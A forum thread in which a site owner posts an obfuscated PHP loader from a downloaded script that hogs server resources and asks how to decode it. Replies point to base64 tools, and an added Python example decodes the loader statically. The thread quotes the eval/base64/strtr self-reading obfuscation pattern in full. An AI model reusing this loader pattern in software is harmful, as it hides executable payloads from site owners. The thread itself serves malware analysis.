how to decode base64 php code

Discussion in 'PHP' started by brookshunt, Mar 10, 2012.

  1. #1
    I downloaded a script and now it's using 100% of my server's resources. I believe the script has malicious code but I am unable to decode it to see. Can someone please explain to me how to view the source code?

    The first part of the script is:
    <?php /*  */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x39c;
    Part 2:
    eval($OOO0000O0('JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDg5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdONDFqOFRDYkxER0U5d1owMldpK01uczdWa3hyeVBJSllYUXV0bWRBUlMvMzVxaFVIcGc2ZnpGQmNPbHZlYW9LPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs='));return;?>
    Part 3:
    flkje~EnhJbS~rkD8a09j409j409jz6PbDJydnHrCTukiYA7zaCiMpT7zeAE1LALQct+fa098eH+6NHEQLALQHt+fa09jNH98eHG1W0+feH9jNH98eRD8eH+6NH+feH91Yt+6NH98eH+6NHE1W0+6NH+6NH9jNSE1PZwjT/ZTWjVtp8WfMOPzRH9mPSGfzhy6PsxBXgIn4DimmVM7nfrsW4Mm9U96npxTnLyCyFkASC2dw0rbkmVsaE0iy5DfT12fWTWtPLiMSE+8zZ+z4WMmwMnnk7sTmxVsDukCndkFXSxdq5rsOUybTgyBWzPAPcI7RH9+L6wjMFw6YOGgeAGitSZFkurCa6kiYt+6NH98eH+6NHG+qmPdT5G1W0+6NH+6NH+6NSZH==srg^bL]qNZ|xKoYHhm

     
    brookshunt, Mar 10, 2012
  2. Bank Developer

    #2
    base64_decode() or any of the tools available online.
     
    Bank Developer, Mar 11, 2012
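
The decoding asked about in the first post, done statically in Python so that nothing from the script is executed (an added example, not part of the thread; `resolve_names` and `reveal_stage` are names chosen here, and `PART1` and `PART2` are copied from Part 1 and Part 2 of the first post):

```python
import base64
import re
from urllib.parse import unquote

# Part 1 (without the "<?php /*  */" prefix) and the eval() argument of Part 2, copied from post #1.
PART1 = "$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$OOO000O00=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$O0O000O00=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$O0O000O0O=$O0O000O00.$OOO000000{11};$O0O000O00=$O0O000O00.$OOO000000{3};$O0O00OO00=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OOO00000O=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x39c;"
PART2 = "JE8wMDBPME8wMD0kT09PMDAwTzAwKCRPT08wTzBPMDAsJ3JiJyk7JE8wTzAwT08wMCgkTzAwME8wTzAwLDB4NDg5KTskT08wME8wME8wPSRPT08wMDAwTzAoJE9PTzAwMDAwTygkTzBPMDBPTzAwKCRPMDAwTzBPMDAsMHgxN2MpLCdONDFqOFRDYkxER0U5d1owMldpK01uczdWa3hyeVBJSllYUXV0bWRBUlMvMzVxaFVIcGc2ZnpGQmNPbHZlYW9LPScsJ0FCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXowMTIzNDU2Nzg5Ky8nKSk7ZXZhbCgkT08wME8wME8wKTs="

# One concatenation term: urldecode('...'), $VAR{n} (character index), or $VAR.
TERM = re.compile(r"urldecode\('([^']*)'\)|\$(\w+)\{(\d+)\}|\$(\w+)")

def resolve_names(php):
    """Evaluate the string-building assignments statically; return {variable: value}."""
    env = {}
    for stmt in filter(None, php.split(";")):
        m = re.fullmatch(r"\s*\$(\w+)(\.?=)(.+)", stmt)
        if not m:
            continue
        name, op, expr = m.groups()
        parts = []
        for term in expr.split("."):
            t = TERM.fullmatch(term.strip())
            if t is None:                      # constant such as __FILE__ or 0x39c: keep its text
                parts.append(term.strip())
            elif t.group(1) is not None:       # urldecode('...')
                parts.append(unquote(t.group(1)))
            elif t.group(2):                   # $VAR{n}
                parts.append(env[t.group(2)][int(t.group(3))])
            else:                              # $VAR
                parts.append(env[t.group(4)])
        value = "".join(parts)
        env[name] = env[name] + value if op == ".=" else value
    return env

def reveal_stage(env, blob):
    """Base64-decode the eval() argument and substitute recovered names; nothing is run."""
    stage = base64.b64decode(blob).decode("ascii")
    return re.sub(r"\$(\w+)", lambda m: env.get(m.group(1), m.group(0)), stage)

if __name__ == "__main__":
    names = resolve_names(PART1)
    print(names)
    print(reveal_stage(names, PART2))
```

The revealed stage opens the script's own file, skips 0x489 bytes, reads the next 0x17c bytes, maps them through strtr() with a custom alphabet into base64_decode(), and passes the result to a second eval().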
  3. MrPJH

    #3
    The above stated code is not base64 encoded.
    However, use base64decode.org to decode, edit and re-encode.
     
    MrPJH, Mar 12, 2012
  4. sonu21

    #4
    sonu21, Mar 20, 2012
  5. harry.singh

    #5
    Can you PM the source file?
     
    harry.singh, Mar 26, 2012
  6. sarahk

    #6
    What is the name of the script?

    It's always a risk when you upload encoded files. I get that the programmers need to protect their intellectual property, but there are other ways of doing it. After all, vB is unencoded and people still happily spend hundreds for their code.
     
    sarahk, Mar 26, 2012